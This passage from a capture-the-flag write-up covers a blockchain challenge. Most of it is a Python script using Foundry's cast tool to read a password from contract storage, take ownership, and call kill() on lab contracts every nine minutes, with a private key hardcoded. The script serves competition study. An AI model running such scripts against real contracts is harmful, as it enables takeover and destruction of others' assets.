IChallengeManager public manager;
address public owner;
address public challenger;
bytes32 codeHash;
bytes32 password;
Of course, we choose the second method because it is much easier to read the storage slot instead of bruting/finding all those values for each contract.
With the password, we can now take ownership of contracts and kill it.
This is the script we used to run to run for every round, which uses cast to do all of our biddings.
Reference: https://github.com/foundry-rs/foundry
import os
import subprocess
import time
from concurrent.futures import ThreadPoolExecutor
# RPC URL and Private Key
RPC_URL = "http://10.100.0.19:8545/"
PRIVATE_KEY = "0xfee86b3227b88d60bd12012d600ab6c0238e28412b4983886c48d1d94daa4958"
# Path to the `cast` binary
CAST_PATH = "/Users/vicevirus/.foundry/bin/cast"
# List of contract addresses
contracts = [
"0x3BA7Dc5C6360cdD70219Cf396974DC7b2d2F83CB",
"0xf84d62756e4eE3b3Bb70Ee7f930F8d2c3fDf6227",
"0x20E8c194d71F6388E1B730a4c704a143533312b2",
# Add more contracts here...
]
# Global counter
run_counter = 0
# Function to execute shell commands with a timeout
def run_command(command, timeout=30):
try:
result = subprocess.check_output(command, shell=True, text=True, timeout=timeout)
return result.strip()
except subprocess.TimeoutExpired:
print(f"Command timed out: {command}")
return None
except subprocess.CalledProcessError as e:
print(f"Error running command: {command}\n{e.output}")
return None
# Function to process a single contract
def process_contract(contract):
print(f"Processing Contract: {contract}")
print("-----------------------------------------")
# Step 1: Fetch the password from storage slot 4
fetch_password_command = f"{CAST_PATH} storage {contract} 4 --rpc-url {RPC_URL}"
print("Fetching password...")
password = run_command(fetch_password_command)
if not password:
print(f"Failed to fetch password for Contract: {contract}. Skipping...")
return
print(f"Password: {password}")
# Step 2: Verify the password
verify_password_command = (
f"{CAST_PATH} send {contract} 'verifyPassword(bytes32)' {password} "
f"--rpc-url {RPC_URL} --private-key {PRIVATE_KEY}"
)
print("Verifying password...")
verify_result = run_command(verify_password_command)
if not verify_result:
print(f"Failed to verify password for Contract: {contract}. Continuing...")
return
print("Password verified successfully.")
# Step 3: Kill the contract
kill_command = (
f"{CAST_PATH} send {contract} 'kill()' "
f"--rpc-url {RPC_URL} --private-key {PRIVATE_KEY}"
)
print("Killing contract...")
kill_result = run_command(kill_command)
if kill_result:
print("Contract killed successfully.")
else:
print(f"Failed to kill Contract: {contract}. Continuing...")
print(f"Completed processing for Contract: {contract}")
print("-----------------------------------------")
# Function to process all contracts in parallel
def process_all_contracts():
global run_counter
run_counter += 1
print(f"Run Count: {run_counter}")
with ThreadPoolExecutor(max_workers=5) as executor:
executor.map(process_contract, contracts)
# Run the script every 9 minutes
while True:
process_all_contracts()
print("Waiting for 9 minutes before the next run...")
time.sleep(9 * 60)End Note
Overall the challenges this year were similar to last year in terms of difficulty except for PWN (not v sure, not a PWN player), but some small part of the Web challenges has rabbit holes or requires abit of fuzzing/guessing. But still top notch quality! Likely this will be my last year playing ACS. Hoping to see new generations playing next year 🫡